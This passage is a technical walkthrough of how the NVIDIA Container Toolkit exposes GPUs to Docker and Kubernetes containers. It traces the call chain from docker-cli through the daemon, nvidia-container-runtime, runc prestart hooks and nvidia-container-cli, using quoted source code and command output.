| GPU  Name        Persistence-M| Bus-Id        Disp.A | Volatile Uncorr. ECC |
| Fan  Temp  Perf  Pwr:Usage/Cap|         Memory-Usage | GPU-Util  Compute M. |
|                               |                      |               MIG M. |
|===============================+======================+======================|
|   0  Tesla T4            On   | 00000000:00:0D.0 Off |                    0 |
| N/A   29C    P8     9W /  70W |      0MiB / 15109MiB |      0%      Default |
|                               |                      |                  N/A |
+-------------------------------+----------------------+----------------------+

+-----------------------------------------------------------------------------+
| Processes:                                                                  |
|  GPU   GI   CI        PID   Type   Process name                  GPU Memory |
|        ID   ID                                                   Usage      |
|=============================================================================|
|  No running processes found                                                 |
+-----------------------------------------------------------------------------+
1.3 CDI
According to "Support for Container Device Interface — NVIDIA Container Toolkit documentation" (https://docs.nvidia.com/datacenter/cloud-native/container-toolkit/latest/cdi-support.html#):
Starting with v1.12.0, the NVIDIA Container Toolkit supports generating Container Device Interface (CDI) specifications. CDI is an open container-runtime specification that abstracts what it means to access a device (such as an NVIDIA GPU) and standardizes device access across container runtimes. Popular container runtimes can read and process this specification to make devices available in containers. CDI simplifies adding support for devices such as NVIDIA GPUs, because the specification works with every container runtime that supports CDI.
Code analysis confirms that CDI mode writes the mount configuration and devices directly into the OCI spec rather than invoking nvidia-container-cli configure, so it does not perform the mounts itself; it also does not support the CUDA compatibility feature.
$ nvidia-ctk cdi generate --output=/etc/cdi/nvidia.yaml
$ docker run --rm -ti --runtime=nvidia -e NVIDIA_VISIBLE_DEVICES=nvidia.com/gpu=all ubuntu cat /proc/self/mountinfo | grep overlay
643 534 0:48 / / rw,relatime master:265 - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/VWXTSEW55YTGJ23XYVXBZE6TIH:/var/lib/docker/overlay2/l/F3QZDOFKONMKPK4LRXRABM3LRQ,upperdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/diff,workdir=/var/lib/docker/overlay2/8f5ca0eeb583611324034844687cbf1706d88b47273ba88624c02858b534fd5f/work
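The generated /etc/cdi/nvidia.yaml declares devices and mounts declaratively, along the following lines (a trimmed, illustrative fragment; the real file produced by nvidia-ctk is much longer and its exact contents depend on driver version):

```yaml
cdiVersion: "0.5.0"
kind: nvidia.com/gpu
devices:
  - name: "0"
    containerEdits:
      deviceNodes:
        - path: /dev/nvidia0
containerEdits:
  mounts:
    - hostPath: /usr/lib/x86_64-linux-gnu/libcuda.so.470.223.02
      containerPath: /usr/lib/x86_64-linux-gnu/libcuda.so.470.223.02
      options: ["ro", "nosuid", "nodev", "bind"]
```

Because the runtime merges these edits straight into the OCI spec, there is no hook-time mount logic left to be redirected by a symlink in the image.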
1.4 gpu-operator
Install gpu-operator following the official documentation (https://docs.nvidia.com/datacenter/cloud-native/gpu-operator/latest/getting-started.html).
gpu-operator installs nvidia-container-toolkit into the host's /usr/local/nvidia directory by mounting host directories into a container named nvidia-container-toolkit-daemonset.
$ kubectl --kubeconfig wanglei-k8s-gpu-kubeconfig.yaml describe pod -n gpu-operator nvidia-container-toolkit-daemonset-fzznt
Name:                 nvidia-container-toolkit-daemonset-fzznt
Namespace:            gpu-operator
Priority:             2000001000
Priority Class Name:  system-node-critical
Node:                 10.0.2.70/10.0.2.70
Start Time:           Thu, 28 Nov 2024 21:00:54 +0800
Labels:               app=nvidia-container-toolkit-daemonset
                      app.kubernetes.io/managed-by=gpu-operator
                      controller-revision-hash=5798fb59f4
                      helm.sh/chart=gpu-operator-v24.9.0
                      pod-template-generation=1
Annotations:          <none>
Status:               Running
IP:                   172.16.0.146
IPs:
  IP:           172.16.0.146
Controlled By:  DaemonSet/nvidia-container-toolkit-daemonset
Init Containers:
  driver-validation:
    Container ID:  containerd://0b6689ed6d9dc8c9103934a900a865faf4fc2604356097b3b151e9b5ffb28310
    Image:         nvcr.io/nvidia/cloud-native/gpu-operator-validator:v24.9.0
    Image ID:      nvcr.io/nvidia/cloud-native/gpu-operator-validator@sha256:70a0bd29259820d6257b04b0cdb6a175f9783d4dd19ccc4ec6599d407c359ba5
    Port:          <none>
    Host Port:     <none>
    Command:
      sh
      -c
    Args:
      nvidia-validator
    State:          Terminated
      Reason:       Completed
      Exit Code:    0
      Started:      Thu, 28 Nov 2024 21:00:55 +0800
      Finished:     Thu, 28 Nov 2024 21:04:41 +0800
    Ready:          True
    Restart Count:  0
    Environment:
      WITH_WAIT:           true
      COMPONENT:           driver
      OPERATOR_NAMESPACE:  gpu-operator (v1:metadata.namespace)
    Mounts:
      /host from host-root (ro)
      /host-dev-char from host-dev-char (rw)
      /run/nvidia/driver from driver-install-dir (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Containers:
  nvidia-container-toolkit-ctr:
    Container ID:  containerd://c236b579e2cd400d98d7a34fb9e4b9037322ad620445da3f1fc91518142ba615
    Image:         nvcr.io/nvidia/k8s/container-toolkit:v1.17.0-ubuntu20.04
    Image ID:      nvcr.io/nvidia/k8s/container-toolkit@sha256:c458c33da393dda19e53dae4cb82f02203714ce0f5358583bf329f3693ec84cb
    Port:          <none>
    Host Port:     <none>
    Command:
      /bin/bash
      -c
    Args:
      /bin/entrypoint.sh
    State:          Running
      Started:      Thu, 28 Nov 2024 21:04:54 +0800
    Ready:          True
    Restart Count:  0
    Environment:    ...
    Mounts:
      /bin/entrypoint.sh from nvidia-container-toolkit-entrypoint (ro,path="entrypoint.sh")
      /driver-root from driver-install-dir (rw)
      /host from host-root (ro)
      /run/nvidia/toolkit from toolkit-root (rw)
      /run/nvidia/validations from run-nvidia-validations (rw)
      /runtime/config-dir/ from containerd-config (rw)
      /runtime/sock-dir/ from containerd-socket (rw)
      /usr/local/nvidia from toolkit-install-dir (rw)
      /usr/share/containers/oci/hooks.d from crio-hooks (rw)
      /var/run/cdi from cdi-root (rw)
      /var/run/secrets/kubernetes.io/serviceaccount from kube-api-access-5h9pr (ro)
Conditions:
  ...
Volumes:
  nvidia-container-toolkit-entrypoint:
    Type:      ConfigMap (a volume populated by a ConfigMap)
    Name:      nvidia-container-toolkit-entrypoint
    Optional:  false
  toolkit-root:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/toolkit
    HostPathType:  DirectoryOrCreate
  run-nvidia-validations:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/validations
    HostPathType:  DirectoryOrCreate
  driver-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /run/nvidia/driver
    HostPathType:  DirectoryOrCreate
  host-root:
    Type:          HostPath (bare host directory volume)
    Path:          /
    HostPathType:
  toolkit-install-dir:
    Type:          HostPath (bare host directory volume)
    Path:          /usr/local/nvidia
    HostPathType:
  crio-hooks:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containers/oci/hooks.d
    HostPathType:
  host-dev-char:
    Type:          HostPath (bare host directory volume)
    Path:          /dev/char
    HostPathType:
  cdi-root:
    Type:          HostPath (bare host directory volume)
    Path:          /var/run/cdi
    HostPathType:  DirectoryOrCreate
  containerd-config:
    Type:          HostPath (bare host directory volume)
    Path:          /etc/containerd
    HostPathType:  DirectoryOrCreate
  containerd-socket:
    Type:          HostPath (bare host directory volume)
    Path:          /run/containerd
    HostPathType:
  ...
Watching processes while starting a GPU container confirms that the mounts are still performed via nvidia-container-toolkit:
root@wanglei-k8s-gpu-02862:~# while true; do ps -ef | grep nvidia-container-cli | grep -v grep; done
root       91175   91173  0 21:04 ?        00:00:00 /bin/sh /usr/local/nvidia/toolkit/nvidia-container-cli --root=/run/nvidia/driver --load-kmods configure --ldconfig=@/run/nvidia/driver/sbin/ldconfig.real --device=GPU-1401ffea-de99-b446-2a8c-15e0797f35bb --compat32 --compute --display --graphics --ngx --utility --video --pid=91165 /mnt/paas/runtime/overlay2/332208ab1f6248114caa9ed78edfcfe09cee0ecf6939e46c942b1e4394df65da/merged
2. Call-Chain Analysis
- nvidia-container-cli (https://github.com/NVIDIA/libnvidia-container/tree/main/src/cli)
- libnvidia-container (https://github.com/NVIDIA/libnvidia-container)
2.1 docker-cli Passes --gpus to the docker daemon
The docker run and docker create commands provide a --gpus flag to specify the GPU devices to pass to the container. The call chain below uses docker create as the example.
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L79
func NewCreateCommand(dockerCli command.Cli) *cobra.Command {
	...
	cmd := &cobra.Command{
		Use:   "create [OPTIONS] IMAGE [COMMAND] [ARG...]",
		Short: "Create a new container",
		...
	}
	...
	copts = addFlags(flags)
	...
}
The --gpus flag is stored in hostConfig and passed to the docker daemon.
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L190
func addFlags(flags *pflag.FlagSet) *containerOptions {
	copts := &containerOptions{
		...
		gpus opts.GpuOpts
		...
	}
	...
	flags.Var(&copts.gpus, "gpus", "GPU devices to add to the container ('all' to pass all GPUs)")
	...
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/opts.go#L593
func parse(flags *pflag.FlagSet, copts *containerOptions, serverOS string) (*containerConfig, error) {
	...
	deviceRequests := copts.gpus.Value()
	if len(cdiDeviceNames) > 0 {
		cdiDeviceRequest := container.DeviceRequest{
			Driver:    "cdi",
			DeviceIDs: cdiDeviceNames,
		}
		deviceRequests = append(deviceRequests, cdiDeviceRequest)
	}
	resources := container.Resources{
		...
		DeviceRequests: deviceRequests,
	}
	...
	hostConfig := &container.HostConfig{
		...
		Resources: resources,
		...
	}
	...
	return &containerConfig{
		Config:           config,
		HostConfig:       hostConfig,
		NetworkingConfig: networkingConfig,
	}, nil
}
https://github.com/docker/cli/blob/v27.1.0/cli/command/container/create.go#L265C2-L265C120
func runCreate(ctx context.Context, dockerCli command.Cli, flags *pflag.FlagSet, options *createOptions, copts *containerOptions) error {
	...
	containerCfg, err := parse(flags, copts, dockerCli.ServerInfo().OSType)
	...
	id, err := createContainer(ctx, dockerCli, containerCfg, options)
	...
}

func createContainer(ctx context.Context, dockerCli command.Cli, containerCfg *containerConfig, options *createOptions) (containerID string, err error) {
	...
	response, err := dockerCli.Client().ContainerCreate(ctx, config, hostConfig, networkingConfig, platform, options.name)
	...
}
2.2 docker daemon Creates the Spec
When the container starts, the daemon creates the OCI spec and sets the prestart hook configuration.
https://github.com/moby/moby/blob/v27.1.0/daemon/start.go#L143C2-L143C65
func (daemon *Daemon) ContainerStart(ctx context.Context, name string, checkpoint string, checkpointDir string) error {
	...
	return daemon.containerStart(ctx, daemonCfg, ctr, checkpoint, checkpointDir, true)
}

func (daemon *Daemon) containerStart(ctx context.Context, daemonCfg *configStore, container *container.Container, checkpoint string, checkpointDir string, resetRestartManager bool) (retErr error) {
	...
	spec, err := daemon.createSpec(ctx, daemonCfg, container, mnts)
	...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L1042
func (daemon *Daemon) createSpec(ctx context.Context, daemonCfg *configStore, c *container.Container, mounts []container.Mount) (retSpec *specs.Spec, err error) {
    ...
    opts = append(opts,
        ...
        WithDevices(daemon, c),
        ...
    )
    ...
}
https://github.com/moby/moby/blob/v27.1.0/daemon/oci_linux.go#L934-L938
func WithDevices(daemon *Daemon, c *container.Container) coci.SpecOpts {
    return func(ctx context.Context, _ coci.Client, _ *containers.Container, s *coci.Spec) error {
        ...
        for _, req := range c.HostConfig.DeviceRequests {
            if err := daemon.handleDevice(req, s); err != nil {
                return err
            }
        }
        ...
    }
}
https://github.com/moby/moby/blob/v27.1.0/daemon/devices.go#L29
func (daemon *Daemon) handleDevice(req container.DeviceRequest, spec *specs.Spec) error {
    if req.Driver == "" {
        for _, dd := range deviceDrivers {
            if selected := dd.capset.Match(req.Capabilities); selected != nil {
                return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
            }
        }
    } else if dd := deviceDrivers[req.Driver]; dd != nil {
        if req.Driver == "cdi" {
            return dd.updateSpec(spec, &deviceInstance{req: req})
        }
        if selected := dd.capset.Match(req.Capabilities); selected != nil {
            return dd.updateSpec(spec, &deviceInstance{req: req, selectedCaps: selected})
        }
    }
    return incompatibleDeviceRequest{req.Driver, req.Capabilities}
}
https://github.com/moby/moby/blob/v27.1.0/daemon/nvidia_linux.go#L92-L99
const nvidiaHook = "nvidia-container-runtime-hook"

func init() {
    if _, err := exec.LookPath(nvidiaHook); err != nil {
        // do not register Nvidia driver if helper binary is not present.
        return
    }
    capset := capabilities.Set{"gpu": struct{}{}, "nvidia": struct{}{}}
    nvidiaDriver := &deviceDriver{
        capset:     capset,
        updateSpec: setNvidiaGPUs,
    }
    for c := range allNvidiaCaps {
        nvidiaDriver.capset[string(c)] = struct{}{}
    }
    registerDeviceDriver("nvidia", nvidiaDriver)
}

func setNvidiaGPUs(s *specs.Spec, dev *deviceInstance) error {
    req := dev.req
    if req.Count != 0 && len(req.DeviceIDs) > 0 {
        return errConflictCountDeviceIDs
    }
    if len(req.DeviceIDs) > 0 {
        s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+strings.Join(req.DeviceIDs, ","))
    } else if req.Count > 0 {
        s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES="+countToDevices(req.Count))
    } else if req.Count < 0 {
        s.Process.Env = append(s.Process.Env, "NVIDIA_VISIBLE_DEVICES=all")
    }
    var nvidiaCaps []string
    // req.Capabilities contains device capabilities, some but not all are NVIDIA driver capabilities.
    for _, c := range dev.selectedCaps {
        nvcap := nvidia.Capability(c)
        if _, isNvidiaCap := allNvidiaCaps[nvcap]; isNvidiaCap {
            nvidiaCaps = append(nvidiaCaps, c)
            continue
        }
        // TODO: nvidia.WithRequiredCUDAVersion
        // for now we let the prestart hook verify cuda versions but errors are not pretty.
    }
    if nvidiaCaps != nil {
        s.Process.Env = append(s.Process.Env, "NVIDIA_DRIVER_CAPABILITIES="+strings.Join(nvidiaCaps, ","))
    }
    path, err := exec.LookPath(nvidiaHook)
    if err != nil {
        return err
    }
    if s.Hooks == nil {
        s.Hooks = &specs.Hooks{}
    }
    // This implementation uses prestart hooks, which are deprecated.
    // CreateRuntime is the closest equivalent, and executed in the same
    // locations as prestart-hooks, but depending on what these hooks do,
    // possibly one of the other hooks could be used instead (such as
    // CreateContainer or StartContainer).
    s.Hooks.Prestart = append(s.Hooks.Prestart, specs.Hook{ //nolint:staticcheck // FIXME(thaJeztah); replace prestart hook with a non-deprecated one.
        Path: path,
        Args: []string{
            nvidiaHook,
            "prestart",
        },
        Env: os.Environ(),
    })
    return nil
}
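After setNvidiaGPUs runs, the container's OCI config.json carries a hook entry roughly like the following (the hook path depends on the installation; this fragment is for illustration only):

```json
{
  "hooks": {
    "prestart": [
      {
        "path": "/usr/bin/nvidia-container-runtime-hook",
        "args": ["nvidia-container-runtime-hook", "prestart"]
      }
    ]
  }
}
```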
After docker has finished building the spec, it starts the runtime.
2.3 nvidia-container-runtime invokes runc
When nvidia-container-toolkit is installed, it registers nvidia-container-runtime as the container runtime.
nvidia-container-runtime acts as a shim layer: it forwards the spec handed down by docker to a lower-level runtime, which by default is usually runc.
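For docker, this registration typically lands in /etc/docker/daemon.json (written by `nvidia-ctk runtime configure --runtime=docker`); a representative fragment:

```json
{
  "runtimes": {
    "nvidia": {
      "path": "nvidia-container-runtime",
      "args": []
    }
  }
}
```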
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/config/config.go#L110
func GetDefault() (*Config, error) {
    d := Config{
        ...
        NVIDIAContainerRuntimeConfig: RuntimeConfig{
            ...
            Runtimes: []string{"docker-runc", "runc", "crun"},
            ...
        },
        ...
    }
    ...
}
So what is the point of nvidia-container-runtime? Mainly to modify the spec. This partly overlaps with the prestart hook that docker already added, but nvidia-container-runtime makes more extensive changes.
Let us now trace the complete nvidia-container-runtime call chain.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime/main.go#L11
func main() {
    r := runtime.New()
    err := r.Run(os.Args)
    if err != nil {
        os.Exit(1)
    }
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime.go#L82
func (r rt) Run(argv []string) (rerr error) {
    ...
    runtime, err := newNVIDIAContainerRuntime(r.logger, cfg, argv, driver)
    ...
    return runtime.Exec(argv)
}
- If the subcommand is not create, it simply invokes runc directly.
- If the subcommand is create, it modifies the spec; the modifications comprise modeModifier, graphicsModifier, and featureModifier.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L49
func newNVIDIAContainerRuntime(logger logger.Interface, cfg *config.Config, argv []string, driver *root.Driver) (oci.Runtime, error) {
    lowLevelRuntime, err := oci.NewLowLevelRuntime(logger, cfg.NVIDIAContainerRuntimeConfig.Runtimes)
    ...
    if !oci.HasCreateSubcommand(argv) {
        logger.Tracef("Skipping modifier for non-create subcommand")
        return lowLevelRuntime, nil
    }
    ociSpec, err := oci.NewSpec(logger, argv)
    ...
    specModifier, err := newSpecModifier(logger, cfg, ociSpec, driver)
    ...
    // Create the wrapping runtime with the specified modifier.
    r := oci.NewModifyingRuntimeWrapper(
        logger,
        lowLevelRuntime,
        ociSpec,
        specModifier,
    )
    return r, nil
}
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/oci/runtime_modifier.go#L56
func (r *modifyingRuntimeWrapper) Exec(args []string) error {
    if HasCreateSubcommand(args) {
        r.logger.Debugf("Create command detected; applying OCI specification modifications")
        err := r.modify()
        if err != nil {
            return fmt.Errorf("could not apply required modification to OCI specification: %w", err)
        }
        r.logger.Debugf("Applied required modification to OCI specification")
    }
    r.logger.Debugf("Forwarding command to runtime %v", r.runtime.String())
    return r.runtime.Exec(args)
}
2.4 What nvidia-container-runtime actually changes in the spec
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L66
// newSpecModifier is a factory method that creates constructs an OCI spec modifier based on the provided config.
func newSpecModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec, driver *root.Driver) (oci.SpecModifier, error) {
    rawSpec, err := ociSpec.Load()
    if err != nil {
        return nil, fmt.Errorf("failed to load OCI spec: %v", err)
    }
    image, err := image.NewCUDAImageFromSpec(rawSpec)
    if err != nil {
        return nil, err
    }
    mode := info.ResolveAutoMode(logger, cfg.NVIDIAContainerRuntimeConfig.Mode, image)
    modeModifier, err := newModeModifier(logger, mode, cfg, ociSpec, image)
    if err != nil {
        return nil, err
    }
    // For CDI mode we make no additional modifications.
    if mode == "cdi" {
        return modeModifier, nil
    }
    graphicsModifier, err := modifier.NewGraphicsModifier(logger, cfg, image, driver)
    if err != nil {
        return nil, err
    }
    featureModifier, err := modifier.NewFeatureGatedModifier(logger, cfg, image)
    if err != nil {
        return nil, err
    }
    modifiers := modifier.Merge(
        modeModifier,
        graphicsModifier,
        featureModifier,
    )
    return modifiers, nil
}
There are three kinds of modeModifier.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/runtime/runtime_factory.go#L105
func newModeModifier(logger logger.Interface, mode string, cfg *config.Config, ociSpec oci.Spec, image image.CUDA) (oci.SpecModifier, error) {
    switch mode {
    case "legacy":
        return modifier.NewStableRuntimeModifier(logger, cfg.NVIDIAContainerRuntimeHookConfig.Path), nil
    case "csv":
        return modifier.NewCSVModifier(logger, cfg, image)
    case "cdi":
        return modifier.NewCDIModifier(logger, cfg, ociSpec)
    }
    return nil, fmt.Errorf("invalid runtime mode: %v", cfg.NVIDIAContainerRuntimeConfig.Mode)
}
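The mode itself comes from the toolkit's config file; a representative fragment (values illustrative, with "auto" resolved by ResolveAutoMode as shown above):

```toml
# /etc/nvidia-container-runtime/config.toml (fragment)
[nvidia-container-runtime]
# "auto" resolves to "legacy", "csv" or "cdi", selecting the matching modifier
mode = "auto"
```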
If mode is cdi, only the modeModifier is applied. The CDIModifier rewrites the hooks, devices, and mounts entries of the spec (these are declared in /etc/cdi/nvidia.yaml).
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/cdi.go#L37
func NewCDIModifier(logger logger.Interface, cfg *config.Config, ociSpec oci.Spec) (oci.SpecModifier, error) {
    devices, err := getDevicesFromSpec(logger, ociSpec, cfg)
    if err != nil {
        return nil, fmt.Errorf("failed to get required devices from OCI specification: %v", err)
    }
    if len(devices) == 0 {
        logger.Debugf("No devices requested; no modification required.")
        return nil, nil
    }
    logger.Debugf("Creating CDI modifier for devices: %v", devices)
    automaticDevices := filterAutomaticDevices(devices)
    if len(automaticDevices) != len(devices) && len(automaticDevices) > 0 {
        return nil, fmt.Errorf("requesting a CDI device with vendor 'runtime.nvidia.com' is not supported when requesting other CDI devices")
    }
    if len(automaticDevices) > 0 {
        automaticModifier, err := newAutomaticCDISpecModifier(logger, cfg, automaticDevices)
        if err == nil {
            return automaticModifier, nil
        }
        logger.Warningf("Failed to create the automatic CDI modifier: %w", err)
        logger.Debugf("Falling back to the standard CDI modifier")
    }
    return cdi.New(
        cdi.WithLogger(logger),
        cdi.WithDevices(devices...),
        cdi.WithSpecDirs(cfg.NVIDIAContainerRuntimeConfig.Modes.CDI.SpecDirs...),
    )
}
The LegacyModifier rewrites the runc prestart hook.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/stable.go#L33
func NewStableRuntimeModifier(logger logger.Interface, nvidiaContainerRuntimeHookPath string) oci.SpecModifier {
    m := stableRuntimeModifier{
        logger:                         logger,
        nvidiaContainerRuntimeHookPath: nvidiaContainerRuntimeHookPath,
    }
    return &m
}
The CSVModifier lets users supply concrete device configuration through CSV files; like CDI mode, it directly modifies the devices entries of the OCI spec.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/csv.go#L42
func NewCSVModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
    if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
        logger.Infof("No modification required; no devices requested")
        return nil, nil
    }
    logger.Infof("Constructing modifier from config: %+v", *cfg)
    if err := checkRequirements(logger, image); err != nil {
        return nil, fmt.Errorf("requirements not met: %v", err)
    }
    csvFiles, err := csv.GetFileList(cfg.NVIDIAContainerRuntimeConfig.Modes.CSV.MountSpecPath)
    if err != nil {
        return nil, fmt.Errorf("failed to get list of CSV files: %v", err)
    }
    if image.Getenv(nvidiaRequireJetpackEnvvar) != "csv-mounts=all" {
        csvFiles = csv.BaseFilesOnly(csvFiles)
    }
    cdilib, err := nvcdi.New(
        nvcdi.WithLogger(logger),
        nvcdi.WithDriverRoot(cfg.NVIDIAContainerCLIConfig.Root),
        nvcdi.WithNVIDIACDIHookPath(cfg.NVIDIACTKConfig.Path),
        nvcdi.WithMode(nvcdi.ModeCSV),
        nvcdi.WithCSVFiles(csvFiles),
    )
    if err != nil {
        return nil, fmt.Errorf("failed to construct CDI library: %v", err)
    }
    spec, err := cdilib.GetSpec()
    if err != nil {
        return nil, fmt.Errorf("failed to get CDI spec: %v", err)
    }
    cdiModifier, err := cdi.New(
        cdi.WithLogger(logger),
        cdi.WithSpec(spec.Raw()),
    )
    if err != nil {
        return nil, fmt.Errorf("failed to construct CDI modifier: %v", err)
    }
    modifiers := Merge(
        nvidiaContainerRuntimeHookRemover{logger},
        cdiModifier,
    )
    return modifiers, nil
}
The GraphicsModifier discovers and adds the graphics-related mounts and DRM device nodes.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/graphics.go#L32
func NewGraphicsModifier(logger logger.Interface, cfg *config.Config, image image.CUDA, driver *root.Driver) (oci.SpecModifier, error) {
    if required, reason := requiresGraphicsModifier(image); !required {
        logger.Infof("No graphics modifier required: %v", reason)
        return nil, nil
    }
    nvidiaCDIHookPath := cfg.NVIDIACTKConfig.Path
    mounts, err := discover.NewGraphicsMountsDiscoverer(
        logger,
        driver,
        nvidiaCDIHookPath,
    )
    if err != nil {
        return nil, fmt.Errorf("failed to create mounts discoverer: %v", err)
    }
    // In standard usage, the devRoot is the same as the driver.Root.
    devRoot := driver.Root
    drmNodes, err := discover.NewDRMNodesDiscoverer(
        logger,
        image.DevicesFromEnvvars(visibleDevicesEnvvar),
        devRoot,
        nvidiaCDIHookPath,
    )
    if err != nil {
        return nil, fmt.Errorf("failed to construct discoverer: %v", err)
    }
    d := discover.Merge(
        drmNodes,
        mounts,
    )
    return NewModifierFromDiscoverer(logger, d)
}
The FeatureGatedModifier adjusts the device and mount entries of the OCI spec according to feature switches in the config: when a feature is enabled, the corresponding device or mount entries are added.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/internal/modifier/gated.go#L38
// NewFeatureGatedModifier creates the modifiers for optional features.
// These include:
//
//	NVIDIA_GDS=enabled
//	NVIDIA_MOFED=enabled
//	NVIDIA_NVSWITCH=enabled
//	NVIDIA_GDRCOPY=enabled
//
// If no devices are selected, no changes are made.
func NewFeatureGatedModifier(logger logger.Interface, cfg *config.Config, image image.CUDA) (oci.SpecModifier, error) {
    if devices := image.DevicesFromEnvvars(visibleDevicesEnvvar); len(devices.List()) == 0 {
        logger.Infof("No modification required; no devices requested")
        return nil, nil
    }
    var discoverers []discover.Discover
    driverRoot := cfg.NVIDIAContainerCLIConfig.Root
    devRoot := cfg.NVIDIAContainerCLIConfig.Root
    if cfg.Features.IsEnabled(config.FeatureGDS, image) {
        d, err := discover.NewGDSDiscoverer(logger, driverRoot, devRoot)
        if err != nil {
            return nil, fmt.Errorf("failed to construct discoverer for GDS devices: %w", err)
        }
        discoverers = append(discoverers, d)
    }
    if cfg.Features.IsEnabled(config.FeatureMOFED, image) {
        d, err := discover.NewMOFEDDiscoverer(logger, devRoot)
        if err != nil {
            return nil, fmt.Errorf("failed to construct discoverer for MOFED devices: %w", err)
        }
        discoverers = append(discoverers, d)
    }
    if cfg.Features.IsEnabled(config.FeatureNVSWITCH, image) {
        d, err := discover.NewNvSwitchDiscoverer(logger, devRoot)
        if err != nil {
            return nil, fmt.Errorf("failed to construct discoverer for NVSWITCH devices: %w", err)
        }
        discoverers = append(discoverers, d)
    }
    if cfg.Features.IsEnabled(config.FeatureGDRCopy, image) {
        d, err := discover.NewGDRCopyDiscoverer(logger, devRoot)
        if err != nil {
            return nil, fmt.Errorf("failed to construct discoverer for GDRCopy devices: %w", err)
        }
        discoverers = append(discoverers, d)
    }
    return NewModifierFromDiscoverer(logger, discover.Merge(discoverers...))
}
2.5 runc invokes nvidia-container-runtime-hook at the prestart stage
https://github.com/opencontainers/runc/blob/v1.1.13/libcontainer/process_linux.go#L462
func (p *initProcess) start() (retErr error) {
    ...
    ierr := parseSync(p.messageSockPair.parent, func(sync *syncT) error {
        switch sync.Type {
        case procSeccomp:
            ...
        case procReady:
            ...
            if err := hooks[configs.Prestart].RunHooks(s); err != nil {
                return err
            }
            ...
        case procHooks:
            ...
            if err := hooks[configs.Prestart].RunHooks(s); err != nil {
                return err
            }
            ...
        default:
            ...
        }
    }
    ...
}
2.6 nvidia-container-runtime-hook invokes nvidia-container-cli
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L179
func main() {
    ...
    switch args[0] {
    case "prestart":
        doPrestart()
        os.Exit(0)
    case "poststart":
        fallthrough
    case "poststop":
        os.Exit(0)
    default:
        flag.Usage()
        os.Exit(2)
    }
}
It executes the configure command of nvidia-container-cli.
https://github.com/NVIDIA/nvidia-container-toolkit/blob/v1.16.1/cmd/nvidia-container-runtime-hook/main.go#L149
func doPrestart() {
    ...
    args := []string{getCLIPath(cli)}
    ...
    args = append(args, "configure")
    ...
    err = syscall.Exec(args[0], args, env)
    ...
}
2.7 nvidia-container-cli calls into libnvidia-container
nvidia-container-cli adds a small level of indirection: the nvc_xxx prefix of libnvidia-container's functions is stripped, and they are invoked through the libnvc.xxx function table instead.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/main.c#L140
int
main(int argc, char *argv[])
{
    ...
    if ((rv = load_libnvc()) != 0)
        goto fail;
    ...
}
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/libnvc.c#L137
int
load_libnvc(void)
{
    if (is_tegra() && !nvml_available())
        return load_libnvc_v0();
    return load_libnvc_v1();
}

...

static int
load_libnvc_v1(void)
{
    #define load_libnvc_func(func) \
        libnvc.func = nvc_##func

    load_libnvc_func(config_free);
    ...
}
nvidia-container-cli configure then performs a large number of mount operations.
https://github.com/NVIDIA/libnvidia-container/blob/v1.16.1/src/cli/configure.c#L376-L433
int
configure_command(const struct context *ctx)
{
    ...
    if (libnvc.driver_mount(nvc, cnt, drv) < 0) {
        warnx("mount error: %s", libnvc.error(nvc));
        goto fail;
    }
    for (size_t i = 0; i < devices.ngpus; ++i) {
        if (libnvc.device_mount(nvc, cnt, devices.gpus[i]) < 0) {
            warnx("mount error: %s", libnvc.error(nvc));
            goto fail;
        }
    }
    if (!mig_config_devices.all && !mig_monitor_devices.all) {
        for (size_t i = 0; i < devices.nmigs; ++i) {
            if (libnvc.mig_device_access_caps_mount(nvc, cnt, devices.migs[i]) < 0) {
                warnx("mount error: %s", libnvc.error(nvc));
                goto fail;
            }
        }
    }
    if (mig_config_devices.all && mig_config_devices.ngpus) {
        if (libnvc.mig_config_global_caps_mount(nvc, cnt) < 0) {
            warnx("mount error: %s", libnvc.error(nvc));
            goto fail;
        }
        for (size_t i = 0; i < mig_config_devices.ngpus; ++i) {
            if (libnvc.device_mig_caps_mount(nvc, cnt, mig_config_devices.gpus[i]) < 0) {
                warnx("mount error: %s", libnvc.error(nvc));
                goto fail;
            }
        }
    }
    if (mig_monitor_devices.all && mig_monitor_devices.ngpus) {
